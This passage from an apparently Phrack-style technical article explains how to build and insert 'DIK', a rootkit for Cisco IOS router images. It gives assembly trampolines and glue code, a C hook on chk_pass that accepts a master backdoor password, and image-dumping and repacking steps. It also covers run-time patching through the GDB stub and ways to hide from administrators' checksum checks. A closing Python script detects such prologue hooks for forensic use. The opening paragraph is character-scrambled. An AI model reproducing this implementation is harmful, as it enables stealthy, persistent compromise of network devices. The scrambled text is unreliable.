Ws' W #ataHsec*get/lagsString67 R $rite #o%n ne% )ile alues to the sa!e )ilena!e R %ith '*ne%' e'tension a##e#* el)*%rite/ile6iosH)ilena!e @ '*ne%'7 +!age !anipulation !ust be #one ery care)ully because it %ill be relocate# a)ter the #eco!pression process an# any inali# !e!ory re)erence coul# lea# to an e'ception resulting in a syste! crash* +n the prece#ing paragraphs" a nu!ber o) !etho#s to insert the rootkit co#e hae been !entione#" but they all hae so!ething in co!!on ,, the rootkit co#e !ust be a##ressable )ro! current +OS )unctions so the !e!ory a##ress selecte# to store the co#e is nee#e#* "ootkit address book: $unctions to %call% in it Since the !etho# selecte# to place our rootkit insi#e the +OS i!age is to oer%rite e'isting strings" the )irst step is to rea# the rootkit that %as preiously co!pile# to e'tract the necessary co#e 6this is achiee# using a script !entione# bello%7 )or the current architecture %hether it's M+0S or 0o%er0C" an# %rite it at the selecte# string location* Once this is #one" the !e!ory a##ress that points to the en# o) the rootkit co#e !ust be store# )or )urther operations on the i!age* 8e't" eery )unction o))set insi#e the preco!pile# rootkit C co#e !ust be kno%n" so %hen an +OS )unction is patche# to call to its rootkit counterpart" the a##ress o) the rootkit )unction !ust be inserte# insi#e the shellco#e that %ill pro#uce the =u!p* /or e'a!ple" %hen re#irecting e'ecution )lo% )ro! 
the IOS image chk_pass() function call to the rootkit counterpart function, the offset of the rootkit function inside the entire compiled rootkit code is needed to jump to its location relative to the original IOS function and then return. If the exact location of the rootkit function is not known, then most likely an exception will eventually be generated. A more in-depth explanation will be given later about this issue and why it's so important. For now, let's just focus on obtaining the rootkit code and its functions' offsets and symbols.

To dump the code disassembly to a file on disk, GCC will be used to compile the rootkit code and then take advantage of the ELF manipulation tools included in the binutils package[10]. A text output will be generated using the objdump utility[11] to disassemble the code and obtain a map of its symbol locations. Next is a sample output from this tool:

    Disassembly of section .text:

    018004d0 <chk_pass-0x4>:
     18004d0:   42 4f 46 5f     bcla-   18,4*cr3+so,465c    ; "BOF_"

    018004d4 <chk_pass>:
     18004d4:   94 21 ff d0     stwu    r1,-48(r1)
     18004d8:   7c 08 02 a6     mflr    r0
     18004dc:   93 e1 00 28     stw     r31,40(r1)
     18004e0:   90 01 00 34     stw     r0,52(r1)
     ....
     1800508:   7c 08 03 a6     mtlr    r0
     180050c:   83 eb ff f8     lwz     r31,-8(r11)
     1800510:   7d 61 5b 78     mr      r1,r11
     1800514:   4e 80 00 20     blr

    01800518 <chk_pass_md5>:
     1800518:   94 21 ff e0     stwu    r1,-32(r1)
     180051c:   7c 08 02 a6     mflr    r0
     1800520:   93 e1 00 18     stw     r31,24(r1)
     1800524:   90 01 00 24     stw     r0,36(r1)
     ....
     1800610:   7c 08 03 a6     mtlr    r0
     1800614:   83 eb ff f8     lwz     r31,-8(r11)
     1800618:   7d 61 5b 78     mr      r1,r11
     180061c:   4e 80 00 20     blr
     1800630:   45 4f 46 5f     .long   0x454f465f          ; .ascii "EOF_"

    01800634 <_start>:
     1800634:   94 21 ff e0     stwu    r1,-32(r1)
     1800638:   93 e1 00 18     stw     r31,24(r1)
     ...

Those symbols containing the function names and addresses will be parsed by a Python program
specially created to return the appropriate information. At the addresses 0x18004d0 and 0x1800630, two ASCII strings can be observed. Those two strings are marker flags set in the plain C rootkit code and used by the scripts to extract the code in between -- which is the rootkit compiled code for the target architecture (whether it's MIPS or PowerPC) and of interest to us. This way the unnecessary code is left behind and only a small amount of code is kept to be inserted into the IOS image.

The resulting file containing disassembly code, symbols and opcodes for every instruction will be processed by a Python script giving a Python tuple object of two elements as a result. The first element (variable code_indexes) is a Python dictionary object indexed by function name and containing the function's starting offset into the second element of the tuple. The second element (variable code_instructions) contains a Python list object with every instruction and the corresponding opcode values to write into the selected string of the IOS image. The relation between them is the following:
    code_indexes[]                    code_instructions()
    +------------------+--------+     +------------+------------------+
    | Function Name    | Offset |     | Opcode     | Instruction      |
    +------------------+--------+     +------------+------------------+
    | chk_pass         |    0   |---->| 0x9421ffd0 | stwu r1,-48(r1)  |
    |                  |        |     |            |                  |
    | chk_pass_md5     |   30   |--+  | ...(30 items between)...      |
    |                  |        |  |  |            |                  |
    | open_file        |   85   |--|->| 0x9421ffd5 | stwu r1,-43(r1)  |
    |                  |        |  |  |            |                  |
    +------------------+--------+  |  | ...(55 items between)...      |
                                   |  |            |                  |
                                   +->| 0x7c030378 | mr r3,r0         |
                                      |            |                  |
                                      | ...(more items)...            |
                                      +------------+------------------+

As you can see, the dictionary object called code_indexes uses the function's name as its key and the corresponding value is the offset into the second object called code_instructions, which contains the parsed output with instructions and their opcodes. This works on both PowerPC and MIPS platforms because it uses the output of the Python script, which is almost the same for both architectures (the script takes care of small differences in the output).

Code voyeurism and fetishism

Once the key functions are found, rootkit insertion will be discussed using a binary patching technique on the IOS image. Once in control of the function, it will take different actions based on the parameters passed at run-time. Let's take for example the password-checking function. In this case the rootkit must take control at the beginning of the function (known as the prologue) to check if the rootkit password was entered. In that case the original password check function won't be executed; otherwise it will be as if nothing had happened. That means that some instructions (architecture dependent) will be overwritten at the prologue of the function and stored for further usage. Next is a common function prologue from an IOS running on PowerPC:
    .text:803B6434   stwu %sp, -0x18(%sp)        # create stack
    .text:803B6438   mflr %r0                    # move ret addr to %r0
    .text:803B643C   stmw %r30, 0x10(%sp)        # save previous values
    .text:803B6440   stw %r0, 0x1C(%sp)          # store ret addr on stack
    .text:803B6444   mr %r31, %r3                # move params to use
    .text:803B6448   mr %r30, %r4                # ...
    .text:803B644C   li %r0, 0
    .text:803B6450   stw %r0, 0x18+var_10(%sp)

Due to the nature of the RISC architecture (despite the differences between MIPS and PowerPC) the return address must be stored by the function prologue because (unlike x86) it's held in a register called LR (Link Register) instead of on the stack. Saving the return address and the registers whose values must remain intact after the function returns is one of the tasks of the prologue.

In order to take control of the execution flow, the first instruction of the original IOS function targeted for redirection (in the case of PowerPC; the first two instructions for IOS running on MIPS) must be overwritten with a jump to a location holding specific shellcode, which was previously selected by replacing a debug string used inside the IOS. The instruction that overwrites the function prologue is called the trampoline and will redirect the execution flow to a location known as glue code. The trampoline is responsible for jumping immediately (and unconditionally) to attacker-specific code that will make some stack arrangements based on a previously known number of parameters to be passed to the rootkit function and ultimately call the appropriate function in the rootkit code. The glue code is responsible for the following:

1. Saving the return address. Due to the fact that the code from
the trampoline 'jumped' to the glue code, this is the address of the instruction following the one that called the original IOS function.
2. Storing the function parameters currently allocated in processor registers into the stack.
3. Allocating space on the stack for an extra function parameter needed by the rootkit C code.
4. Calling the rootkit plain C code.
5. Processing the return value of the rootkit C code to decide whether to continue the execution of the original IOS function or return directly to the caller.
6. If the execution of the original function must continue, then the original function call parameters stored in the stack are restored, the overwritten instructions from the original IOS function are executed, and finally a jump to the instruction next to the trampoline is performed.
7. If the execution of the original function must not be performed, the value at the memory allocated for the extra parameter is copied into the register that contains the return value of the original function, followed by a jump to the return address stored in step number one.

This high level explanation is intended to briefly explain the functionality of the glue code and to express that it is a vital part of the bridge that connects the original IOS functions (now subverted) with the counterpart rootkit functions written in plain C. The beginning of the function, which was previously located using IDA through string references (from neighbors or itself), had its prologue overwritten with the trampoline code. This is a common technique known as hooking and consists of intercepting a function call by redirecting the code execution to the rootkit code for further processing and then returning to the original point. Below is a high-level graphic explaining the execution path until it reaches the rootkit code and how the information is processed:
        IOS caller              chk_pass(p)             Glue code                  chk_pass_DIK(p,i)
    +------------------+    +------------------+    +-----------------------+    +------------------+
    |                  |    |                  |    |                       |    |                  |
    | r = chk_pass(p)  |-1->| trampoline       |-2->| add stack             |-3->| if p == 'l337':  |
    |                  |    |                  |    | store parent RA       |    |   i = true       |
    | if r == true:    |<-+ | rest of code     |<-+ | store params p        |    |   return RET     |
    |   login()        |  | | ...              |  | | create param i        |    | else:            |
    | else:            |  +-| return legal_res |  | | o = chk_pass_DIK(p,i) |    |   return CONT    |
    |   deny_login()   |    |                  |  | | fix stack             |<-4-|                  |
    |   ...            |    +------------------+  | | if o == CONT:         |    +------------------+
    |                  |                          | |   exec orig instruct  |
    +------------------+                          | |   return params p     |
             ^                                    +-|   cont chk_pass_IOS   | 5
             |                                      | else:                 |
             +------------------6-------------------|   r = i               |
                                                    |   jump to RA          |
                                                    +-----------------------+

In the following example, the IOS function responsible for password checking is hooked and, based on the result (whether the password is a backdoor password or not), the execution flow is redirected again to either invoke the original function code or to return directly to the caller (bypassing authentication), as explained below:

1. A function inside the IOS calls the password validation function chk_pass(). At the beginning of this function, using the hooking technique to apply the trampoline's code, the rootkit seizes control of the execution flow. In the case of PowerPC we simply write a branch instruction (b) like the following:

    .text:803B7984   48 DC C3 9C   b loc_81183D50

The next example covers the case of the MIPS architecture, where a jump instruction (j) will be written at the function prologue, followed by a NOP instruction to avoid problems with delay-slots on this architecture:
    LOAD:60460A04   08 5A 54 BB   j loc_616952EC
    LOAD:60460A08   00 00 00 00   nop

This is the reason why in IOS, with images for the MIPS architecture, two instructions in the prologue are overwritten.

2. The glue code is invoked so that the steps previously explained take place. Now a detailed explanation of the shellcode used will be shown for calling a function that expects four parameters, three of which are the original function's parameters, while the fourth parameter is the return value (this value is ignored by the shellcode if the function doesn't return any value, as in the case of void functions). Following is a complete disassembly of the glue code for the PowerPC architecture:

    .data:81183D50 loc_81183D50:
    .data:81183D50   mflr %r0               # Save return address
    .data:81183D54   stw %r0, -4(%sp)       # Copy ret addr into stack
    .data:81183D58   stw %r3, -0xC(%sp)     # Store param 1
    .data:81183D5C   stw %r4, -0x10(%sp)    # Store param 2
    .data:81183D60   stw %r5, -0x14(%sp)    # Store param 3
    .data:81183D64   addi %r6, %sp, -8      # Get address of param 4
    .data:81183D68   stwu %sp, -0x1C(%sp)   # Save stack space for params
    .data:81183D6C   bl sub_81183BB4        # Invoke DIK plain C code
    .data:81183D70   addi %sp, %sp, 0x1C    # Restore allocated stack
    .data:81183D74   cmpwi %r3, 0           # Check if RETURN to caller
    .data:81183D78   lwz %r3, -4(%sp)       # Obtain ret address stored
    .data:81183D7C   mtlr %r3               # Copy ret addr to register
    .data:81183D80   beq loc_81183D98_RET   # Exec RETURN or CONT code?
    .data:81183D84   lwz %r3, -0xC(%sp)     # Restore original param 1
    .data:81183D88   lwz %r4, -0x10(%sp)    # Restore original param 2
    .data:81183D8C   lwz %r5, -0x14(%sp)    # Restore original param 3
    .data:81183D90   stwu %sp, -0x18(%sp)   # Execute overwritten inst
    .data:81183D94   b loc_803B7988         # Continue after trampoline
    -------------------------------------------------------------------
    .data:81183D98
    .data:81183D98 loc_81183D98_RET:        # CODE XREF: .data:81183D80#j
    .data:81183D98   lwz %r3, -8(%sp)       # Set function return value
    .data:81183D9C   blr                    # Return to IOS caller

The comments next to every instruction in the above disassembly represent the steps previously described when the glue code was first introduced. It's important to remind readers at this point that the part of this shellcode that stores/restores the original function parameters was dynamically calculated by the IDA-Python script. It's also worth mentioning that the compiled rootkit code, which was placed in memory that originally belonged to a debug string, was successfully executed, allowing the attacker to achieve one of the most important goals of this rootkit -- which is to maintain a single code base written in plain C that works for both platforms without having to take care of architecture-specific details.

The MIPS code performs the same task as the PowerPC code but with the corresponding MIPS instructions:

    DATA:616952EC loc_616952EC:
    DATA:616952EC   sw $ra, -4($sp)         # Copy ret addr into stack
    DATA:616952F0   sw $a0, -0xC($sp)       # Store param 1
    DATA:616952F4   sw $a1, -0x10($sp)      # Store param 2
    DATA:616952F8   sw $a2, -0x14($sp)      # Store param 3
    DATA:616952FC   addi $a3, $sp, 0xFFF8   # Get address of param 4
    DATA:61695300   addiu $sp, -0x1C        # Save stack space for params
    DATA:61695304   jal sub_616951E4        # Invoke DIK plain C code
    DATA:61695308   nop                     # nop for delay-slot
    DATA:6169530C   addiu $sp, 0x1C         # Restore allocated stack
    DATA:61695310   lw $ra, -4($sp)         # Obtain ret address stored
    DATA:61695314   beqz $v0, loc_61695338  # Exec RETURN or CONT code?
    DATA:61695318   nop                     # nop for delay-slot
    DATA:6169531C   lw $a0, -0xC($sp)       # Restore original param 1
    DATA:61695320   lw $a1, -0x10($sp)      # Restore original param 2
    DATA:61695324   lw $a2, -0x14($sp)      # Restore original param 3
    DATA:61695328   addiu $sp, -0x18        # Execute 1st overwritten inst
    DATA:6169532C   sw $s0, 0x18($sp)       # Execute 2nd overwritten inst
    DATA:61695330   j loc_60460A0C          # Continue after trampoline
    DATA:61695334   nop                     # nop for delay-slot
    -------------------------------------------------------------------
    DATA:61695338
    DATA:61695338 loc_61695338:             # CODE XREF: DATA:61695314#j
    DATA:61695338   lw $v0, -8($sp)         # Set function return value
    DATA:6169533C   jr $ra                  # Return to IOS caller
    DATA:61695340   nop                     # nop for delay-slot

It's also important to note that the address where the glue code starts is at the end of the rootkit code, so all the code is put together in the same memory area (and hopefully the same memory page).

In the scenario described above, the tasks performed by the glue code can be summarized by saying that it stores the return address of the original function call, calls the rootkit function with the same arguments as the legitimate IOS function, and processes the result of the function call. This result is needed to determine whether execution flow will return to the instruction following the trampoline and continue the original path by executing the instructions that were overwritten with the trampoline (in case the password entered is not the rootkit password), or return directly to the trampoline's caller because no more password validation is needed (in case the password entered is the rootkit's master password), which means that the attacker is logging in.

The glue code is crucial for rootkit operations; some of those painful steps might not be necessary if the rootkit code were implemented in pure assembly. In the case of DIK it was implemented in plain C to allow easy maintenance. Now it's clear why those few lines of special assembly instructions called trampoline and glue code were needed to fill the gap between a C function compiled (with Position Independent Code) for the target architecture and extracted to be inserted 'as is' directly
inside the IOS image. The advantage of this method is that only one C code base is maintained (with certain limitations, of course) instead of two assembly code bases that perform the same actions on different architectures (a MIPS one and a PowerPC one).

Learning the a, b, (plain) C

The rootkit code will change according to the needs of the attacker, which may include hiding files, hiding connections, maintaining backdoors, cleaning logs, etc. -- all of them providing a complete stealth operation during an attacker's visit. Those features will take the form of C functions and once those functions' code is compiled, their bytes will be needed so they can be inserted into the IOS image. But a problem arises because the compiled code is an ELF file for the target architecture, and this is where the flags (BOF_ and EOF_) -- mentioned in the 'rootkit address book' section (the dump sample included those flags) -- will be used to separate the bytes of interest for the attacker from the rest of the ELF file. Those flags are just inline assembly markers like the following:

    #define BOF_DIK_CODE asm(".ascii \"BOF_\"")
    #define EOF_DIK_CODE asm(".ascii \"EOF_\"")

Those two markers were placed at the beginning and at the end of a source code file (always outside of existing functions) so the compiler simply includes them, and then a Python script can take advantage of this to delimit the necessary code for the rootkit. The rootkit also required that the strings be in the same section as the code (.TEXT) instead of in different sections like they usually are, so a way to include them
next to the functions and a way to obtain their addresses (and that those addresses support PIC, Position Independent Code) was absolutely necessary. Otherwise the rootkit wouldn't have string support and that's not acceptable. To address this issue, inline assembly was employed to put the raw strings beside a function and then obtain the pointer to those strings through this function, using shellcode that resolves the current function address (to allow PIC) and then adds an offset which is architecture specific. The idea was to create a function that contained the string and also the shellcode to return its memory address (like a char*), so the following steps were needed:

    void pszPassword(void)      // String pointer name
    {
        1. Code that obtains the current PC.
        2. Store the PC into a variable.
        3. Add an offset (to point to the inline asm instruction) to point to the function's end.
        4. Return the variable pointing to the end of the function (the string begins there).
    }
    asm(".ascii \"my backdoor password\"");   // Our string
    asm(".byte 0");                           // Null terminator

With this scheme, a macro was created to reference the function address plus an offset (which is architecture specific) to skip the function's code up to the first byte after the epilogue. The epilogue length varies between architectures, so we determine the current working architecture using GCC internal definitions to obtain the correct offset value. The fully functional macros for both PowerPC and MIPS are shown below in a macro called STRING_DEFINE.

    #ifdef __mips__
    #define _OFFSET 0x30
    #elif __PPC__
    #define _OFFSET 0x34
    #endif

    #ifdef __mips__
    #define STRING_DEFINE(name,content) char* name(void) \
    { \
        int ret = 0; \
        int orig_blr; \
        asm("move %0, $ra" \
            :"=r"(orig_blr)); \
        asm("nop"); \
        asm("bal +4;"); \
        asm("move %0, $ra" \
            :"=r"(ret)); \
        asm("move $ra, %0" \
            ::"r"(orig_blr)); \
        return (char*)ret+_OFFSET;\
    } \
    asm(".ascii \"" content "\"");\
    asm(".byte 0");
    #elif __PPC__
    #define STRING_DEFINE(name,content) char* name(void) \
    { \
        int ret; \
        int orig_blr; \
        asm("mflr %r8;"); \
        asm("mr %0, %%r8" \
            :"=r"(orig_blr)); \
        asm("bl +4;"); \
        asm("mflr %r8;"); \
        asm("mr %0, %%r8" \
            :"=r"(ret)); \
        asm("mr %%r8, %0" \
            ::"r"(orig_blr)); \
        asm("mtlr %r8;"); \
        return (char*)ret+_OFFSET;\
    } \
    asm(".ascii \"" content "\"");\
    asm(".byte 0");
    #endif

This macro takes two parameters: the first is the pointer name (function name) and the second is the content (the string itself). So, to use it, refer to that string (get a pointer to it) like any other string. A small detail is that the "naked" attribute is not available for those target architectures, and that is why the offset trick to skip the prologue is needed. Otherwise the function prologue and epilogue wouldn't be included by the compiler. Below is an example of usage of the string macro:

    STRING_DEFINE(pszPassword, "dik_rulez")

    void myRootkitFunction(int somearg)
    {
        char* pszPass = pszPassword();            // Function name as string pointer
        // or
        printf("Password = %s", pszPassword());   // common pointer usage
    }

With the string issue solved, the rest of the rootkit code is simply a plain C program
like any other, and the only thing to keep in mind is that the rootkit's functions must follow a few rules. These rules are that rootkit functions must return an integer to indicate to the glue code whether to continue execution of the original IOS function or return to the caller -- and also must include one parameter more than the original IOS function, which will contain the return value of the original IOS function in case returning to the caller is needed.

    uint chk_pass_DIK(char *input, char *correct, uint val, uint* hook_res)
    {
        // my_strcmp is also a rootkit function
        if (my_strcmp(input, pszPassword()) == 0) {
            *hook_res = 1;      // master password specified
            return OP_RETURN;
        }
        return OP_CONTINUE;
    }

In the above example, the usage of a function to return a string pointer is shown, as well as invoking another rootkit function (in this case the my_strcmp function). It is clear at this point that the rootkit functionality is only limited by the attacker's creativity because it's like programming anything else in C.

Functioning without the other functions

A function that performs password checking is useful to retrieve other users' passwords in plain text, and if this information could be written somewhere (maybe a hidden file on the flash file system) or transmitted over a TCP connection using IOS socket handling capabilities, it would be of great interest for an attacker. There are several functions besides the one mentioned above that a rootkit must hook/patch to take complete control of the system. Those functions include equivalents of file-handling functions like read/write, socket handling like send/recv, and IOS functions that implement the CLI (Command Line Interface) commands that can alert the system administrator of unauthorized access. Pointers to those functions need to be used from the C rootkit code to be able to employ them
in the rootkit code. This could be done by creating stub functions in the C code that contain a jump to the function's location inside the image, but this location will only be resolved after analyzing the IOS image with IDA. To solve this problem, the stub functions could be created in the code containing a call to an index inside a jump table, which could be filled by a Python script with the address of the real function in memory. Modern compilers use this approach to dynamically resolve the addresses of library functions referenced by a user program, which at compile time are unknown to the compiler/linker and become known when the program is executed and the jump table is filled with the resolved (current) memory addresses.

Being able to use IOS internal functions gives the rootkit a more advanced level of stealth, and allows for capabilities that go far beyond simple function hooking. For example, normal security procedures like the system administrator periodically downloading the IOS image to perform a checksum (like MD5, SHA1, etc.) as part of the company security process to detect modified images could be easily redirected to an external server that contains an unaltered image without raising any suspicion. It could even intercept the read function calls asking for a chunk of the compressed image on flash (or any other media) and at that moment decompress the infected chunk, patch it with the original bytes (which were previously stored in a file on the flash file system -- assuming that those functions' addresses are known by previous analysis) and re-compress it so it's returned intact (this is possible since the compression algorithm
can work with chunks of bytes instead of the entire file). At this point, the difference between a low level rootkit and a simple TCL script can be appreciated, because actions like the one mentioned above could never be achieved by a higher level rootkit. One important feature of the rootkit is that the hooking method doesn't need any additional process running to perform those actions, so listing processes is not going to help with detection, because all that DIK does is intercept function calls and redirect execution flow to perform certain tasks and then continue at the address after the redirection took place.

Ready, steady, go

With the rootkit code in place, it's time to dump the newly-patched IOS image, repack it with the original (self decompressing) file header and upload it to the target system. Reading the patched IDA image and writing its content to a file can be done easily, as in the following example:

    from struct import pack

    # Create a new file to write the changed bytes
    fd_tmp = open('rootkit_content.tmp', 'wb')
    code_dump = ''

    # Iterate through every byte changed in the original IOS image
    #
    # rootkit_address contains initial rootkit address where previously
    # a debug string was located.
    #
    # current_endEA contains the last modified image address
    #
    # get_long(ea) is the IDAPython 32-bit read at address ea
    for ea in range(rootkit_address, current_endEA, 4):
        code_dump += pack('>L', get_long(ea))

    fd_tmp.write(code_dump)
    fd_tmp.close()

This generated file will later be merged with the original IOS file to create the decompressed backdoored IOS image. No details will be given about how to merge the ready rootkit code in the temporary file with the original IOS image -- because this is a trivial byte replacement operation and the offsets to apply the patch on the original image can be obtained from IDA. The checksum of the patched IOS image must be calculated again because now that its content has changed the old checksum values won't match. A script in Python that implements the checksum algorithm
described at the beginning can be used to recalculate the checksum and recreate the self decompressing IOS image using the original image header (from the first byte to the end of the SFX section) and obtain an image ready to be uploaded to the device using a normal image upgrade procedure.

Other ways of The Force

Image binary patching has been discussed in depth, but a run-time memory patching technique is also possible using the GDB[12] stub included inside every IOS image. The GDB stub is the debugging interface for Cisco developers which allows them to debug IOS processes. It also allows remote image diagnostics because it's capable of working over a Telnet session as well as over a serial session established on the console port. This GDB stub is capable of working in three different ways:

Process examination: Allows memory inspection and processor register inspection, but it cannot modify system values (memory or register values). The system execution continues normally during debugging, so 'examine' mode can be executed over a Telnet session.

Process debugging: In situations where a console port of the device is not accessible, process debug mode can be executed. It works by catching unhandled exceptions in the specified process, setting it in a special state where it will not be rescheduled and then running the debugger process to debug the failed process. The IOS system continues to run during process debugging, so it is possible to debug a process over a Telnet session, but certain restrictions apply. The scheduler, an interrupt service routine or any process needed for the debugging path (such as TCP/IP) cannot be debugged over this session. This debugging mode is capable of memory and processor register modification, so this is the best option for an attacker to remotely modify the device memory to insert the backdoor.

Kernel debugging:
If the attacker gains physical access to a console port, he or she can execute the kernel debugger, which is the preferred way to debug a router. In this mode, the entire device execution is stopped during the exception, freezing all system state.

Using the Telnet connection, a remote GDB instance can be executed to perform memory patching, but certain precautions must be taken, such as not writing the trampoline code before the rootkit code, because if a patched function is invoked before the rootkit code is in place a memory access violation will be raised, leading to a system crash. An attacker might want to automate this run-time patching procedure for every system restart, and it can be accomplished in a few different ways. One possible way is to create a TCL script to execute at startup, engage a Telnet session with the local host and execute the process debugger to patch the device it is running on. In this case, the script must contain the rootkit code inside with the memory locations to be modified -- which could have been previously obtained by the same analysis phase involved in the image binary patching procedure.

Conclusions

A reliable and generic method for Cisco IOS image infection can be implemented either via binary image modification or via run-time code patching. To face this kind of threat the only possibility available today is to use CIR[13], a tool created by Felix 'FX' Lindner from Recurity Labs and presented early this year when he talked about developments in IOS forensics[14]. The CIR analysis framework aims at identifying compromised routers, exploitation attempts and backdoors -- as well as process and memory anomalies. The framework inspects a snapshot of the live IOS memory (core dump or GDB debug connection) and reconstructs the central data structures, providing an abstraction layer for in-depth analysis modules and reporting. It's important to make a special mention of CIR because it's the ONLY serious (and possible) way to perform
forensics on a Cisco device, and it still might be complicated if the rootkit controls the core-dump generation routines. In that case, the CIR alternative methods like the GDB debug connection should be used. Unless every system administrator plans on using advanced forensics methods on every device on their networks, like the one (and only) mentioned before, they should take serious security measures and try to keep the devices updated to minimize risks. Even this work may not be enough to detect an advanced rootkit already deployed in the system, depending on the stealth level of the rootkit -- so, external methods of device compromise detection should be conceived, because relying on a possibly infected image is as bad as running antivirus on a computer already infected, and relying on an OS that is already compromised.

References

[1] A free Python interpreter for Windows called ActivePython can be obtained at: http://www.activestate.com/Products/activepython/features.plex
[2] Python for beginners http://wiki.python.org/moin/BeginnersGuide
[3] IDA Pro disassembler and debugger http://www.hex-rays.com/idapro/
[4] IDAPython is a plug-in for IDA Pro to allow python scripts to be executed in the context of IDA and to access all of its functions. It can be downloaded from http://d-dome.net/idapython
[5] 'The ELF virus writing HOWTO' http://www.linuxsecurity.com/resource_files/documentation/virus-writing-HOWTO/_html/index.html
[6] Daniel Hodson presentation at RUXCON 2004 http://www.ruxcon.org.au/files/2004/11-daniel_hodson.ppt
[7] Download GCC (GNU Compiler Collection) at http://gcc.gnu.org/
[8] GCC cross compiler info at: http://en.wikipedia.org/wiki/Cross_compiler
[9] PyElf is a simple library for easy ELF file manipulation. Refer to Core Security Technologies' site for news about it.
[10] GNU Binutils can be obtained at: http://www.gnu.org/software/binutils/binutils.html
[11] Information about the tool called objdump included in binutils can be obtained at http://en.wikipedia.org/wiki/Objdump
[12] GDB is The GNU Debugger Project and information about it can be obtained from http://sourceware.org/gdb/
[13] CIR (Cisco Information Retrieval) http://cir.recurity-labs.com/
[14] 'Developments in IOS Forensics' http://www.recurity-labs.com/content/pub/SecurityLabs_Developments_in_IOS_Forensics.pdf
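The conclusions call for compromise detection that does not trust the running device. As an added example (not part of DIK or of the paper's tooling), the Python script below checks function entry points for the prologue trampolines described in the hooking section: it compares the entry words of a decompressed image against a known-good copy obtained out of band and decodes any unconditional PowerPC b or MIPS j/nop found there. The load address, function names and image bytes are constructed for the demo.

```python
"""Prologue-hook check for PowerPC and MIPS function entries.

Example added here; not part of DIK or of the paper's tooling.  The
trampoline described in the paper overwrites the first instruction of a
hooked IOS function (PowerPC 'b') or the first two (MIPS 'j' plus a
delay-slot nop) with an unconditional jump into glue code.  Given a
known-good image obtained out of band and the entry addresses of the
functions worth watching, report entries whose words differ from the
reference and decode any unconditional branch found there.
"""
import struct

PPC_B_OPCODE = 18      # primary opcode of the PowerPC b/ba/bl/bla family
MIPS_J_OPCODE = 2      # primary opcode of MIPS j (jal is 3: a normal call)
MIPS_NOP = 0x00000000


def decode_ppc_branch(word, pc):
    """Target of an unconditional PowerPC 'b' (LK=0) at pc, else None."""
    if word >> 26 != PPC_B_OPCODE or word & 1:   # LK=1 is 'bl', a plain call
        return None
    li = word & 0x03FFFFFC
    if li & 0x02000000:                           # sign-extend the displacement
        li -= 0x04000000
    return (li if word & 2 else pc + li) & 0xFFFFFFFF   # AA=1 means absolute


def decode_mips_jump(word, next_word, pc):
    """Target of a MIPS 'j' with a nop in its delay slot at pc, else None."""
    if word >> 26 != MIPS_J_OPCODE or next_word != MIPS_NOP:
        return None
    # The target takes its top four bits from the delay-slot address.
    return ((pc + 4) & 0xF0000000) | ((word & 0x03FFFFFF) << 2)


def entry_words(image, base, addr, count=2):
    """Read `count` big-endian 32-bit words at virtual address addr."""
    off = addr - base
    return struct.unpack('>%dI' % count, image[off:off + 4 * count])


def check_prologues(arch, image, base, functions, reference=None):
    """Return (name, addr, kind, detail) findings, ordered by address.

    functions maps name -> entry address; reference is a known-good image
    loading at the same base (None skips the byte comparison).
    """
    findings = []
    for name, addr in sorted(functions.items(), key=lambda kv: kv[1]):
        words = entry_words(image, base, addr)
        if reference is not None:
            ref = entry_words(reference, base, addr)
            if words != ref:
                findings.append((name, addr, 'modified',
                                 'entry %08x %08x, reference %08x %08x' % (words + ref)))
        if arch == 'ppc':
            target = decode_ppc_branch(words[0], addr)
        elif arch == 'mips':
            target = decode_mips_jump(words[0], words[1], addr)
        else:
            raise ValueError('unsupported architecture: %s' % arch)
        if target is not None:
            findings.append((name, addr, 'trampoline',
                             'unconditional jump to 0x%08x' % target))
    return findings


# Constructed demo data: a made-up load address and two watched functions.
BASE = 0x80300000
FUNCS = {'chk_pass': BASE + 0x40, 'open_file': BASE + 0x60}
# Genuine prologues (real encodings): PowerPC stwu r1,-0x28(r1); mflr r0
PPC_PROLOGUE = struct.pack('>II', 0x9421FFD8, 0x7C0802A6)
# and MIPS addiu sp,sp,-0x18; sw s0,0x10(sp).
MIPS_PROLOGUE = struct.pack('>II', 0x27BDFFE8, 0xAFB00010)


def build_images(arch):
    """Return (reference, patched) blobs; patched has chk_pass hooked."""
    prologue = PPC_PROLOGUE if arch == 'ppc' else MIPS_PROLOGUE
    ref = bytearray(0x100)
    for addr in FUNCS.values():
        ref[addr - BASE:addr - BASE + 8] = prologue
    glue = BASE + 0x80                  # where the glue code would sit
    entry = FUNCS['chk_pass']
    if arch == 'ppc':                   # b glue: opcode 18, AA=0, LK=0
        hook = struct.pack('>I', (PPC_B_OPCODE << 26) | ((glue - entry) & 0x03FFFFFC))
    else:                               # j glue ; nop
        hook = struct.pack('>II', (MIPS_J_OPCODE << 26) | ((glue >> 2) & 0x03FFFFFF), MIPS_NOP)
    patched = bytearray(ref)
    patched[entry - BASE:entry - BASE + len(hook)] = hook
    return bytes(ref), bytes(patched)


if __name__ == '__main__':
    for arch in ('ppc', 'mips'):
        ref, patched = build_images(arch)
        for finding in check_prologues(arch, patched, BASE, FUNCS, ref):
            print(arch, finding)
```

A clean image yields no findings; the hooked chk_pass entry is reported twice, once as differing from the reference and once with the decoded jump target, which is where a forensic analyst would look for the glue code and the rootkit body next to it.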